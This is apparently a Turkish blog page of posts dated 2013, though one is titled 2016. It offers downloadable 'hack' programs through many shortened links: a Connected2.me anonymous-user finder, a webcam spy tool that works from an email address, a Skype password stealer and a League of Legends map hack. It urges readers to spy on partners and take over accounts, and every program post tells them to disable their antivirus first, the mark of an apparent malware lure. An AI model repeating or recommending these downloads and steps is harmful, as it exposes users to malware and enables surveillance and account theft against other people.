11 Ağustos 2013 Pazar

Connected2 Anonim Bulma



Artık hepimizin neredeyse Facebook kadar yaygın kullandığı, uğradığı Connected2.me sitesi kullanıcıları için bir "hile" yayınlıyoruz.

Hepimizin başına gelmiştir; hoş giden sohbet bir anda bozulup küfürleşmeye gitmiş, biri sizi çok sevdiğini söyleyip çıkmış ya da sizi takip ettiğini söyleyip aldatmaya çalışmıştır. Bu olaylar karşısında tek yapabildiğiniz şey "kim yahu bu" diye sorabilmek.

En azından şimdiye kadar öyleydi "Connected2 Anonim Bulucu" ile sadece konuştuğunuz anonimin (anon) numarasını yazarak, kullanıcı adını elde edebilirsiniz. Connected2 sitesinin bir kod hatasından yaralanılarak yapılan bu programçok işinize yarayacak.

Not: Tarayıcınız dosyanın indirilmesine ya da açılmasına engel oluyorsa şifreli linki deneyiniz. Ribony ile c2.me sitelerinin aynı serverı kullandığı bilgisini aldık tam emin olmamakla birlikte şansınızı bu sitede de deneyebilirsiniz.

Hepinize iyi avlar diliyoruz. Programı aşağıdaki linklerden indirebilirsiniz;

http://bit.ly/2iAq6ej   pass: c2me
http://bit.ly/1S2PfYt
http://bit.ly/1Sn6lxf
http://bit.ly/1RKVPnv
http://bit.ly/1oLVk0J
http://bit.ly/22kg3pG
http://bit.ly/1MLkL7e
http://bit.ly/1SqJFAl

6 Ağustos 2013 Salı

Web Cam Hack


Sadece e-mailini bildiğiniz birinin Webcam'ini gözetlemek istemez misiniz? Web Cam Hack ile sadece e-mail adresini yazarak (ve biraz bekleyerek) bu isteğinizi yerine getirebilirsiniz. IP aramaya artık gerek yok. Programın  kullanımı yukarıdaki videoda anlatılmıştır.

Program aşağıdaki linklerden birine tıklayarak indirebilirsiniz;

http://bit.ly/2aowd0W
http://bit.ly/2akunRc
http://bit.ly/2al43jy
http://bit.ly/2aA0zhF
http://bit.ly/2aGDGqV
http://bit.ly/2akutbo

Not: Program karşı tarafın bilgisayarına gireceği için virüs tarayıcınız tarafından zararlı yazılım olarak algılanabilir. Programı çalıştırmadan önce virüs programınızı kapatın ya da programın çalışmasına izin verin.

5 Ağustos 2013 Pazartesi

Skype Password Hacker







Gıcık olduğunuz birine şaka yapmak istiyorsunuz ya da sevgilinizin skype hesabında kimlerin olduğunu öğrenmek istiyorsunuz. Ama bir türlü şifreyi ele geçiremediniz. Bırakın şifre size gelsin. Ultimate Skype Password Hacker  tam da bunun için yapılmış.


Programı nasıl kullanacağınız yukarıdaki videoda anlatılmıştır. Kolay ve saniyeler içinde istediğiniz kişinin skype şifresini elinize geçirebilirsiniz (daha sonra onunla neler yapacağınız size kalmış) 

Not: Program şifreler içerdiğinden virüs koruma programınız alarm verebilir. Lütfen programı çalıştırmadan önce bu programları kapatın ya da dosyanın
çalışmasına izin vermesini sağlayın.

 Programı şu linklerden indirebilirsiniz;

http://bit.ly/2aSgLby
http://bit.ly/2apHzPn
http://bit.ly/2aCVncC
http://bit.ly/2aA1oHs
http://bit.ly/2aA1QFC
http://bit.ly/2ahGH0p


İyi Eğlenceler.

League Of Legends [LoL] Map Hack (2016)




Son günlerin gözde oyunu LoL oyuncuları için çalışmalarımız devam ediyor. Çoğu kişi son zamanlarda oyun oyunu oynarken çalılarda gizlenenlerin artık çok kolay bulunduğunu, bunun nasıl olduğunu aklından geçirmiştir. 

İşte cevabımız ; LoL Map Hack. Bu program size istediğiniz skinleri vermekle kalmaz ayrıca sınırsız zoom out imkanı, çalılıktaki rakiplerinizi görme imkanı ve sis içindeki rakiplarinizi görme imkanı da verir. Başlangıç ekranında şampiyonunuza bazı ekstra zırh ve saldırı özellikleri de keleyebilirsiniz. Programı aşağıdaki linklerden indirebilirsiniz;

http://bit.ly/2alZ8C9
http://bit.ly/2aCXwoC
http://bit.ly/2al7Hdh
http://bit.ly/2a7JGva
http://bit.ly/2alZEjw
http://bit.ly/2al77fF

İyi Oyunlar!

Not; Hack LoL dosyalarınıza müdahale edeceğinden virüs koruyucunuz tarafından engellenebilir. Hack'i uygulamadan önce lütfen virüs koruyucunuzu kapatın ya da bu dosyaya izin verin.

Lol, map hack, speed hack, zoom hack s4, working, skin hack, League of legends, rp, ip, item